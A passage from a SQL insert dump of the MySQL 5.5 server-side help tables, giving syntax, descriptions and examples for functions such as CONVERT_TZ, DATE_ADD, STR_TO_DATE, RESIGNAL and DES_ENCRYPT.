http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html\n\n','mysql> SELECT 1 IS NULL, 0 IS NULL, NULL IS NULL;\n -> 0, 0, 1\n','http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html'),(370,'CONVERT_TZ',32,'Syntax:\nCONVERT_TZ(dt,from_tz,to_tz)\n\nCONVERT_TZ() converts a datetime value dt from the time zone given by\nfrom_tz to the time zone given by to_tz and returns the resulting\nvalue. Time zones are specified as described in\nhttp://dev.mysql.com/doc/refman/5.5/en/time-zone-support.html. This\nfunction returns NULL if the arguments are invalid.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT CONVERT_TZ(\'2004-01-01 12:00:00\',\'GMT\',\'MET\');\n -> \'2004-01-01 13:00:00\'\nmysql> SELECT CONVERT_TZ(\'2004-01-01 12:00:00\',\'+00:00\',\'+10:00\');\n -> \'2004-01-01 22:00:00\'\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(371,'TIME_TO_SEC',32,'Syntax:\nTIME_TO_SEC(time)\n\nReturns the time argument, converted to seconds.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT TIME_TO_SEC(\'22:23:00\');\n -> 80580\nmysql> SELECT TIME_TO_SEC(\'00:39:38\');\n -> 2378\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(372,'WEEKDAY',32,'Syntax:\nWEEKDAY(date)\n\nReturns the weekday index for date (0 = Monday, 1 = Tuesday, ... 6 =\nSunday).\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT WEEKDAY(\'2008-02-03 22:23:00\');\n -> 6\nmysql> SELECT WEEKDAY(\'2007-11-06\');\n -> 1\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(373,'EXPORT_SET',38,'Syntax:\nEXPORT_SET(bits,on,off[,separator[,number_of_bits]])\n\nReturns a string such that for every bit set in the value bits, you get\nan on string and for every bit not set in the value, you get an off\nstring. Bits in bits are examined from right to left (from low-order to\nhigh-order bits). Strings are added to the result from left to right,\nseparated by the separator string (the default being the comma\ncharacter \",\"). The number of bits examined is given by number_of_bits,\nwhich has a default of 64 if not specified. number_of_bits is silently\nclipped to 64 if larger than 64. It is treated as an unsigned integer,\nso a value of −1 is effectively the same as 64.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT EXPORT_SET(5,\'Y\',\'N\',\',\',4);\n -> \'Y,N,Y,N\'\nmysql> SELECT EXPORT_SET(6,\'1\',\'0\',\',\',10);\n -> \'0,1,1,0,0,0,0,0,0,0\'\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(374,'ALTER SERVER',40,'Syntax:\nALTER SERVER server_name\n OPTIONS (option [, option] ...)\n\nAlters the server information for server_name, adjusting any of the\noptions permitted in the CREATE SERVER statement. The corresponding\nfields in the mysql.servers table are updated accordingly. This\nstatement requires the SUPER privilege.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/alter-server.html\n\n','ALTER SERVER s OPTIONS (USER \'sally\');\n','http://dev.mysql.com/doc/refman/5.5/en/alter-server.html'),(375,'RESIGNAL',24,'Syntax:\nRESIGNAL [condition_value]\n [SET signal_information_item\n [, signal_information_item] ...]\n\ncondition_value:\n SQLSTATE [VALUE] sqlstate_value\n | condition_name\n\nsignal_information_item:\n condition_information_item_name = simple_value_specification\n\ncondition_information_item_name:\n CLASS_ORIGIN\n | SUBCLASS_ORIGIN\n | MESSAGE_TEXT\n | MYSQL_ERRNO\n | CONSTRAINT_CATALOG\n | CONSTRAINT_SCHEMA\n | CONSTRAINT_NAME\n | CATALOG_NAME\n | SCHEMA_NAME\n | TABLE_NAME\n | COLUMN_NAME\n | CURSOR_NAME\n\ncondition_name, simple_value_specification:\n (see following discussion)\n\nRESIGNAL passes on the error condition information that is available\nduring execution of a condition handler within a compound statement\ninside a stored procedure or function, trigger, or event. RESIGNAL may\nchange some or all information before passing it on. RESIGNAL is\nrelated to SIGNAL, but instead of originating a condition as SIGNAL\ndoes, RESIGNAL relays existing condition information, possibly after\nmodifying it.\n\nRESIGNAL makes it possible to both handle an error and return the error\ninformation. Otherwise, by executing an SQL statement within the\nhandler, information that caused the handler\'s activation is destroyed.\nRESIGNAL also can make some procedures shorter if a given handler can\nhandle part of a situation, then pass the condition \"up the line\" to\nanother handler.\n\nNo special privileges are required to execute the RESIGNAL statement.\n\nAll forms of RESIGNAL require that the current context be a condition\nhandler. Otherwise, RESIGNAL is illegal and a RESIGNAL when handler not\nactive error occurs.\n\nFor condition_value and signal_information_item, the definitions and\nrules are the same for RESIGNAL as for SIGNAL. For example, the\ncondition_value can be an SQLSTATE value, and the value can indicate\nerrors, warnings, or \"not found.\" For additional information, see [HELP\nSIGNAL].\n\nThe RESIGNAL statement takes condition_value and SET clauses, both of\nwhich are optional. This leads to several possible uses:\n\no RESIGNAL alone:\n\nRESIGNAL;\n\no RESIGNAL with new signal information:\n\nRESIGNAL SET signal_information_item [, signal_information_item] ...;\n\no RESIGNAL with a condition value and possibly new signal information:\n\nRESIGNAL condition_value\n [SET signal_information_item [, signal_information_item] ...];\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/resignal.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/resignal.html'),(376,'TIME FUNCTION',32,'Syntax:\nTIME(expr)\n\nExtracts the time part of the time or datetime expression expr and\nreturns it as a string.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT TIME(\'2003-12-31 01:02:03\');\n -> \'01:02:03\'\nmysql> SELECT TIME(\'2003-12-31 01:02:03.000123\');\n -> \'01:02:03.000123\'\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(377,'DATE_ADD',32,'Syntax:\nDATE_ADD(date,INTERVAL expr unit), DATE_SUB(date,INTERVAL expr unit)\n\nThese functions perform date arithmetic. The date argument specifies\nthe starting date or datetime value. expr is an expression specifying\nthe interval value to be added or subtracted from the starting date.\nexpr is a string; it may start with a \"-\" for negative intervals. unit\nis a keyword indicating the units in which the expression should be\ninterpreted.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT \'2008-12-31 23:59:59\' + INTERVAL 1 SECOND;\n -> \'2009-01-01 00:00:00\'\nmysql> SELECT INTERVAL 1 DAY + \'2008-12-31\';\n -> \'2009-01-01\'\nmysql> SELECT \'2005-01-01\' - INTERVAL 1 SECOND;\n -> \'2004-12-31 23:59:59\'\nmysql> SELECT DATE_ADD(\'2000-12-31 23:59:59\',\n -> INTERVAL 1 SECOND);\n -> \'2001-01-01 00:00:00\'\nmysql> SELECT DATE_ADD(\'2010-12-31 23:59:59\',\n -> INTERVAL 1 DAY);\n -> \'2011-01-01 23:59:59\'\nmysql> SELECT DATE_ADD(\'2100-12-31 23:59:59\',\n -> INTERVAL \'1:1\' MINUTE_SECOND);\n -> \'2101-01-01 00:01:00\'\nmysql> SELECT DATE_SUB(\'2005-01-01 00:00:00\',\n -> INTERVAL \'1 1:1:1\' DAY_SECOND);\n -> \'2004-12-30 22:58:59\'\nmysql> SELECT DATE_ADD(\'1900-01-01 00:00:00\',\n -> INTERVAL \'-1 10\' DAY_HOUR);\n -> \'1899-12-30 14:00:00\'\nmysql> SELECT DATE_SUB(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1997-12-02\'\nmysql> SELECT DATE_ADD(\'1992-12-31 23:59:59.000002\',\n -> INTERVAL \'1.999999\' SECOND_MICROSECOND);\n -> \'1993-01-01 00:00:01.000001\'\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(378,'CAST',38,'Syntax:\nCAST(expr AS type)\n\nThe CAST() function takes an expression of any type and produces a\nresult value of a specified type, similar to CONVERT(). See the\ndescription of CONVERT() for more information.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/cast-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/cast-functions.html'),(379,'SOUNDS LIKE',38,'Syntax:\nexpr1 SOUNDS LIKE expr2\n\nThis is the same as SOUNDEX(expr1) = SOUNDEX(expr2).\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(380,'PERIOD_DIFF',32,'Syntax:\nPERIOD_DIFF(P1,P2)\n\nReturns the number of months between periods P1 and P2. P1 and P2\nshould be in the format YYMM or YYYYMM. Note that the period arguments\nP1 and P2 are not date values.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT PERIOD_DIFF(200802,200703);\n -> 11\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(381,'LIKE',38,'Syntax:\nexpr LIKE pat [ESCAPE \'escape_char\']\n\nPattern matching using a SQL pattern. Returns 1 (TRUE) or 0 (FALSE). If\neither expr or pat is NULL, the result is NULL.\n\nThe pattern need not be a literal string. For example, it can be\nspecified as a string expression or table column.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-comparison-functions.html\n\n','mysql> SELECT \'David!\' LIKE \'David_\';\n -> 1\nmysql> SELECT \'David!\' LIKE \'%D%v%\';\n -> 1\n','http://dev.mysql.com/doc/refman/5.5/en/string-comparison-functions.html'),(382,'MULTIPOINT',25,'MultiPoint(pt1,pt2,...)\n\nConstructs a MultiPoint value using Point or WKB Point arguments.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-mysql-specific-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/gis-mysql-specific-functions.html'),(383,'>>',19,'Syntax:\n>>\n\nShifts a longlong (BIGINT) number to the right.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/bit-functions.html\n\n','mysql> SELECT 4 >> 2;\n -> 1\n','http://dev.mysql.com/doc/refman/5.5/en/bit-functions.html'),(384,'FETCH',24,'Syntax:\nFETCH [[NEXT] FROM] cursor_name INTO var_name [, var_name] ...\n\nThis statement fetches the next row for the SELECT statement associated\nwith the specified cursor (which must be open), and advances the cursor\npointer. If a row exists, the fetched columns are stored in the named\nvariables. The number of columns retrieved by the SELECT statement must\nmatch the number of output variables specified in the FETCH statement.\n\nIf no more rows are available, a No Data condition occurs with SQLSTATE\nvalue \'02000\'. To detect this condition, you can set up a handler for\nit (or for a NOT FOUND condition). For an example, see\nhttp://dev.mysql.com/doc/refman/5.5/en/cursors.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/fetch.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/fetch.html'),(385,'AVG',16,'Syntax:\nAVG([DISTINCT] expr)\n\nReturns the average value of expr. The DISTINCT option can be used to\nreturn the average of the distinct values of expr.\n\nAVG() returns NULL if there were no matching rows.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html\n\n','mysql> SELECT student_name, AVG(test_score)\n -> FROM student\n -> GROUP BY student_name;\n','http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html'),(386,'TRUE FALSE',30,'The constants TRUE and FALSE evaluate to 1 and 0, respectively. The\nconstant names can be written in any lettercase.\n\nmysql> SELECT TRUE, true, FALSE, false;\n -> 1, 1, 0, 0\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/boolean-literals.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/boolean-literals.html'),(387,'MBRWITHIN',7,'MBRWithin(g1,g2)\n\nReturns 1 or 0 to indicate whether the minimum bounding rectangle of g1\nis within the minimum bounding rectangle of g2. This tests the opposite\nrelationship as MBRContains().\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/spatial-relation-functions-mysql-specific.html\n\n','mysql> SET @g1 = GeomFromText(\'Polygon((0 0,0 3,3 3,3 0,0 0))\');\nmysql> SET @g2 = GeomFromText(\'Polygon((0 0,0 5,5 5,5 0,0 0))\');\nmysql> SELECT MBRWithin(@g1,@g2), MBRWithin(@g2,@g1);\n+--------------------+--------------------+\n| MBRWithin(@g1,@g2) | MBRWithin(@g2,@g1) |\n+--------------------+--------------------+\n| 1 | 0 |\n+--------------------+--------------------+\n','http://dev.mysql.com/doc/refman/5.5/en/spatial-relation-functions-mysql-specific.html'),(388,'SESSION_USER',17,'Syntax:\nSESSION_USER()\n\nSESSION_USER() is a synonym for USER().\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/information-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/information-functions.html'),(389,'IN',20,'Syntax:\nexpr IN (value,...)\n\nReturns 1 if expr is equal to any of the values in the IN list, else\nreturns 0. If all values are constants, they are evaluated according to\nthe type of expr and sorted. The search for the item then is done using\na binary search. This means IN is very quick if the IN value list\nconsists entirely of constants. Otherwise, type conversion takes place\naccording to the rules described in\nhttp://dev.mysql.com/doc/refman/5.5/en/type-conversion.html, but\napplied to all the arguments.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html\n\n','mysql> SELECT 2 IN (0,3,5,7);\n -> 0\nmysql> SELECT \'wefwf\' IN (\'wee\',\'wefwf\',\'weg\');\n -> 1\n','http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html'),(390,'QUOTE',38,'Syntax:\nQUOTE(str)\n\nQuotes a string to produce a result that can be used as a properly\nescaped data value in an SQL statement. The string is returned enclosed\nby single quotation marks and with each instance of backslash (\"\\\"),\nsingle quote (\"\'\"), ASCII NUL, and Control+Z preceded by a backslash.\nIf the argument is NULL, the return value is the word \"NULL\" without\nenclosing single quotation marks.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT QUOTE(\'Don\\\'t!\');\n -> \'Don\\\'t!\'\nmysql> SELECT QUOTE(NULL);\n -> NULL\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(391,'HELP COMMAND',27,'Syntax:\nmysql> help search_string\n\nIf you provide an argument to the help command, mysql uses it as a\nsearch string to access server-side help from the contents of the MySQL\nReference Manual. The proper operation of this command requires that\nthe help tables in the mysql database be initialized with help topic\ninformation (see\nhttp://dev.mysql.com/doc/refman/5.5/en/server-side-help-support.html).\n\nIf there is no match for the search string, the search fails:\n\nmysql> help me\n\nNothing found\nPlease try to run \'help contents\' for a list of all accessible topics\n\nUse help contents to see a list of the help categories:\n\nmysql> help contents\nYou asked for help about help category: \"Contents\"\nFor more information, type \'help \', where is one of the\nfollowing categories:\n Account Management\n Administration\n Data Definition\n Data Manipulation\n Data Types\n Functions\n Functions and Modifiers for Use with GROUP BY\n Geographic Features\n Language Structure\n Plugins\n Storage Engines\n Stored Routines\n Table Maintenance\n Transactions\n Triggers\n\nIf the search string matches multiple items, mysql shows a list of\nmatching topics:\n\nmysql> help logs\nMany help items for your request exist.\nTo make a more specific request, please type \'help \',\nwhere is one of the following topics:\n SHOW\n SHOW BINARY LOGS\n SHOW ENGINE\n SHOW LOGS\n\nUse a topic as the search string to see the help entry for that topic:\n\nmysql> help show binary logs\nName: \'SHOW BINARY LOGS\'\nDescription:\nSyntax:\nSHOW BINARY LOGS\nSHOW MASTER LOGS\n\nLists the binary log files on the server. This statement is used as\npart of the procedure described in [purge-binary-logs], that shows how\nto determine which logs can be purged.\n\nmysql> SHOW BINARY LOGS;\n+---------------+-----------+\n| Log_name | File_size |\n+---------------+-----------+\n| binlog.000015 | 724935 |\n| binlog.000016 | 733481 |\n+---------------+-----------+\n\nThe search string can contain the wildcard characters \"%\" and \"_\".\nThese have the same meaning as for pattern-matching operations\nperformed with the LIKE operator. For example, HELP rep% returns a list\nof topics that begin with rep:\n\nmysql> HELP rep%\nMany help items for your request exist.\nTo make a more specific request, please type \'help \',\nwhere is one of the following\ntopics:\n REPAIR TABLE\n REPEAT FUNCTION\n REPEAT LOOP\n REPLACE\n REPLACE FUNCTION\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mysql-server-side-help.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/mysql-server-side-help.html'),(392,'QUARTER',32,'Syntax:\nQUARTER(date)\n\nReturns the quarter of the year for date, in the range 1 to 4.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT QUARTER(\'2008-04-01\');\n -> 2\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(393,'POSITION',38,'Syntax:\nPOSITION(substr IN str)\n\nPOSITION(substr IN str) is a synonym for LOCATE(substr,str).\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(394,'SHOW CREATE FUNCTION',27,'Syntax:\nSHOW CREATE FUNCTION func_name\n\nThis statement is similar to SHOW CREATE PROCEDURE but for stored\nfunctions. See [HELP SHOW CREATE PROCEDURE].\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-create-function.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-create-function.html'),(395,'IS_USED_LOCK',14,'Syntax:\nIS_USED_LOCK(str)\n\nChecks whether the lock named str is in use (that is, locked). If so,\nit returns the connection identifier of the client session that holds\nthe lock. Otherwise, it returns NULL.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/miscellaneous-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/miscellaneous-functions.html'),(396,'POLYFROMTEXT',4,'PolyFromText(wkt[,srid]), PolygonFromText(wkt[,srid])\n\nConstructs a Polygon value using its WKT representation and SRID.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-wkt-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/gis-wkt-functions.html'),(397,'DES_ENCRYPT',12,'Syntax:\nDES_ENCRYPT(str[,{key_num|key_str}])\n\nEncrypts the string with the given key using the Triple-DES algorithm.\n\nThis function works only if MySQL has been configured with SSL support.\nSee http://dev.mysql.com/doc/refman/5.5/en/ssl-connections.html.\n\nThe encryption key to use is chosen based on the second argument to\nDES_ENCRYPT(), if one was given. With no argument, the first key from\nthe DES key file is used. With a key_num argument, the given key number\n(0 to 9) from the DES key file is used. With a key_str argument, the\ngiven key string is used to encrypt str.\n\nThe key file can be specified with the --des-key-file server option.\n\nThe return string is a binary string where the first character is\nCHAR(128 | key_num). If an error occurs, DES_ENCRYPT() returns NULL.\n\nThe 128 is added to make it easier to recognize an encrypted key. If\nyou use a string key, key_num is 127.\n\nThe string length for the result is given by this formula:\n\nnew_len = orig_len + (8 - (orig_len % 8)) + 1\n\nEach line in the DES key file has the following format:\n\nkey_num des_key_str\n\nEach key_num value must be a number in the range from 0 to 9. Lines in\nthe file may be in any order. des_key_str is the string that is used to\nencrypt the message. There should be at least one space between the\nnumber and the key. The first key is the default key that is used if\nyou do not specify any key argument to DES_ENCRYPT().\n\nYou can tell MySQL to read new key values from the key file with the\nFLUSH DES_KEY_FILE statement. This requires the RELOAD privilege.\n\nOne benefit of having a set of default keys is that it gives\napplications a way to check for the existence of encrypted column\nvalues, without giving the end user the right to decrypt those values.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/encryption-functions.html\n\n','mysql> SELECT customer_address FROM customer_table \n > WHERE crypted_credit_card = DES_ENCRYPT(\'credit_card_number\');\n','http://dev.mysql.com/doc/refman/5.5/en/encryption-functions.html'),(398,'CEIL',3,'Syntax:\nCEIL(X)\n\nCEIL() is a synonym for CEILING().\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html'),(399,'LENGTH',38,'Syntax:\nLENGTH(str)\n\nReturns the length of the string str, measured in bytes. A multibyte\ncharacter counts as multiple bytes. This means that for a string\ncontaining five 2-byte characters, LENGTH() returns 10, whereas\nCHAR_LENGTH() returns 5.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT LENGTH(\'text\');\n -> 4\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(400,'STR_TO_DATE',32,'Syntax:\nSTR_TO_DATE(str,format)\n\nThis is the inverse of the DATE_FORMAT() function. It takes a string\nstr and a format string format. STR_TO_DATE() returns a DATETIME value\nif the format string contains both date and time parts, or a DATE or\nTIME value if the string contains only date or time parts. If the date,\ntime, or datetime value extracted from str is illegal, STR_TO_DATE()\nreturns NULL and produces a warning.\n\nThe server scans str attempting to match format to it. The format\nstring can contain literal characters and format specifiers beginning\nwith %. Literal characters in format must match literally in str.\nFormat specifiers in format must match a date or time part in str. For\nthe specifiers that can be used in format, see the DATE_FORMAT()\nfunction description.\n\nmysql> SELECT STR_TO_DATE(\'01,5,2013\',\'%d,%m,%Y\');\n -> \'2013-05-01\'\nmysql> SELECT STR_TO_DATE(\'May 1, 2013\',\'%M %d,%Y\');\n -> \'2013-05-01\'\n\nScanning starts at the beginning of str and fails if format is found\nnot to match. Extra characters at the end of str are ignored.\n\nmysql> SELECT STR_TO_DATE(\'a09:30:17\',\'a%h:%i:%s\');\n -> \'09:30:17\'\nmysql> SELECT STR_TO_DATE(\'a09:30:17\',\'%h:%i:%s\');\n -> NULL\nmysql> SELECT STR_TO_DATE(\'09:30:17a\',\'%h:%i:%s\');\n -> \'09:30:17\'\n\nUnspecified date or time parts have a value of 0, so incompletely\nspecified values in str produce a result with some or all parts set to\n0:\n\nmysql> SELECT STR_TO_DATE(\'abc\',\'abc\');\n -> \'0000-00-00\'\nmysql> SELECT STR_TO_DATE(\'9\',\'%m\');\n -> \'0000-09-00\'\nmysql> SELECT STR_TO_DATE(\'9\',\'%s\');\n -> \'00:00:09\'\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(401,'Y',11,'Y(p)\n\nReturns the Y-coordinate value for the Point object p as a\ndouble-precision number.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-point-property-functions.html\n\n','mysql> SELECT Y(POINT(56.7, 53.34));\n+-----------------------+\n| Y(POINT(56.7, 53.34)) |\n+-----------------------+\n| 53.34 |\n+-----------------------+\n','http://dev.mysql.com/doc/refman/5.5/en/gis-point-property-functions.html'),(402,'CHECKSUM TABLE',21,'Syntax:\nCHECKSUM TABLE tbl_name [, tbl_name] ... [ QUICK | EXTENDED ]\n\nCHECKSUM TABLE reports a table checksum. During the checksum operation,\nthe table is locked with a read lock for InnoDB and MyISAM. This\nstatement requires the SELECT privilege for the table.\n\nThis statement is not supported for views. If you run CHECKSUM TABLE\nagainst a view, the Checksum value is always NULL, and a warning is\nreturned.\n\nWith QUICK, the live table checksum is reported if it is available, or\nNULL otherwise. This is very fast. A live checksum is enabled by\nspecifying the CHECKSUM=1 table option when you create the table;\ncurrently, this is supported only for MyISAM tables. See [HELP CREATE\nTABLE].\n\nWith EXTENDED, the entire table is read row by row and the checksum is\ncalculated. This can be very slow for large tables.\n\nIf neither QUICK nor EXTENDED is specified, MySQL returns a live\nchecksum if the table storage engine supports it and scans the table\notherwise.\n\nFor a nonexistent table, CHECKSUM TABLE returns NULL and generates a\nwarning.\n\nIn MySQL 5.5, CHECKSUM TABLE returns 0 for partitioned tables unless\nyou include the EXTENDED option. This issue is resolved in MySQL 5.6.\n(Bug #11933226, Bug #60681)\n\nThe checksum value depends on the table row format. If the row format\nchanges, the checksum also changes. For example, the storage format for\ntemporal types such as TIME, DATETIME, and TIMESTAMP changes in MySQL\n5.6 prior to MySQL 5.6.5, so if a 5.5 table is upgraded to MySQL 5.6,\nthe checksum value may change.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/checksum-table.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/checksum-table.html'),(403,'NUMINTERIORRINGS',2,'NumInteriorRings(poly)\n\nReturns the number of interior rings in the Polygon value poly.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-polygon-property-functions.html\n\n','mysql> SET @poly =\n -> \'Polygon((0 0,0 3,3 3,3 0,0 0),(1 1,1 2,2 2,2 1,1 1))\';\nmysql> SELECT NumInteriorRings(GeomFromText(@poly));\n+---------------------------------------+\n| NumInteriorRings(GeomFromText(@poly)) |\n+---------------------------------------+\n| 1 |\n+---------------------------------------+\n','http://dev.mysql.com/doc/refman/5.5/en/gis-polygon-property-functions.html'),(404,'INTERIORRINGN',2,'InteriorRingN(poly,N)\n\nReturns the N-th interior ring for the Polygon value poly as a\nLineString. Rings are numbered beginning with 1.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-polygon-property-functions.html\n\n','mysql> SET @poly =\n -> \'Polygon((0 0,0 3,3 3,3 0,0 0),(1 1,1 2,2 2,2 1,1 1))\';\nmysql> SELECT AsText(InteriorRingN(GeomFromText(@poly),1));\n+----------------------------------------------+\n| AsText(InteriorRingN(GeomFromText(@poly),1)) |\n+----------------------------------------------+\n| LINESTRING(1 1,1 2,2 2,2 1,1 1) |\n+----------------------------------------------+\n','http://dev.mysql.com/doc/refman/5.5/en/gis-polygon-property-functions.html'),(405,'UTC_TIME',32,'Syntax:\nUTC_TIME, UTC_TIME()\n\nReturns the current UTC time as a value in \'HH:MM:SS\' or HHMMSS.uuuuuu\nformat, depending on whether the function is used in a string or\nnumeric context.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT UTC_TIME(), UTC_TIME() + 0;\n -> \'18:07:53\', 180753.000000\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(406,'DROP FUNCTION',40,'The DROP FUNCTION statement is used to drop stored functions and\nuser-defined functions (UDFs):\n\no For information about dropping stored functions, see [HELP DROP\n PROCEDURE].\n\no For information about dropping user-defined functions, see [HELP DROP\n FUNCTION UDF].\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/drop-function.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/drop-function.html'),(407,'ALTER EVENT',40,'Syntax:\nALTER\n [DEFINER = { user | CURRENT_USER }]\n EVENT event_name\n [ON SCHEDULE schedule]\n [ON COMPLETION [NOT] PRESERVE]\n [RENAME TO new_event_name]\n [ENABLE | DISABLE | DISABLE ON SLAVE]\n [COMMENT \'comment\']\n [DO event_body]\n\nThe ALTER EVENT statement changes one or more of the characteristics of\nan existing event without the need to drop and recreate it. The syntax\nfor each of the DEFINER, ON SCHEDULE, ON COMPLETION, COMMENT, ENABLE /\nDISABLE, and DO clauses is exactly the same as when used with CREATE\nEVENT. (See [HELP CREATE EVENT].)\n\nAny user can alter an event defined on a database for which that user\nhas the EVENT privilege. When a user executes a successful ALTER EVENT\nstatement, that user becomes the definer for the affected event.\n\nALTER EVENT works only with an existing event:\n\nmysql> ALTER EVENT no_such_event \n > ON SCHEDULE \n > EVERY \'2:3\' DAY_HOUR;\nERROR 1517 (HY000): Unknown event \'no_such_event\'\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/alter-event.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/alter-event.html'),(408,'STDDEV',16,'Syntax:\nSTDDEV(expr)\n\nReturns the population standard deviation of expr. This function is\nprovided for compatibility with Oracle. The standard SQL function\nSTDDEV_POP() can be used instead.\n\nThis function returns NULL if there were no matching rows.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html'),(409,'DATE_SUB',32,'Syntax:\nDATE_SUB(date,INTERVAL expr unit)\n\nSee the description for DATE_ADD().\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(410,'PERIOD_ADD',32,'Syntax:\nPERIOD_ADD(P,N)\n\nAdds N months to period P (in the format YYMM or YYYYMM). Returns a\nvalue in the format YYYYMM. Note that the period argument P is not a\ndate value.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT PERIOD_ADD(200801,2);\n -> 200803\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(411,'|',19,'Syntax:\n|\n\nBitwise OR:\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/bit-functions.html\n\n','mysql> SELECT 29 | 15;\n -> 31\n','http://dev.mysql.com/doc/refman/5.5/en/bit-functions.html'),(412,'UUID_SHORT',14,'Syntax:\nUUID_SHORT()\n\nReturns a \"short\" universal identifier as a 64-bit unsigned integer\n(rather than a string-form 128-bit identifier as returned by the UUID()\nfunction).\n\nThe value of UUID_SHORT() is guaranteed to be unique if the following\nconditions hold:\n\no The server_id of the current host is unique among your set of master\n and slave servers\n\no server_id is between 0 and 255\n\no You do not set back your system time for your server between mysqld\n restarts\n\no You do not invoke UUID_SHORT() on average more than 16 million times\n per second between mysqld restarts\n\nThe UUID_SHORT() return value is constructed this way:\n\n (server_id & 255) << 56\n+ (server_startup_time_in_seconds << 24)\n+ incremented_variable++;\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/miscellaneous-functions.html\n\n','mysql> SELECT UUID_SHORT();\n -> 92395783831158784\n','http://dev.mysql.com/doc/refman/5.5/en/miscellaneous-functions.html'),(413,'GEOMFROMTEXT',4,'GeomFromText(wkt[,srid]), GeometryFromText(wkt[,srid])\n\nConstructs a geometry value of any type using its WKT representation\nand SRID.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-wkt-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/gis-wkt-functions.html'),(414,'RIGHT',38,'Syntax:\nRIGHT(str,len)\n\nReturns the rightmost len characters from the string str, or NULL if\nany argument is NULL.\n\nURL: 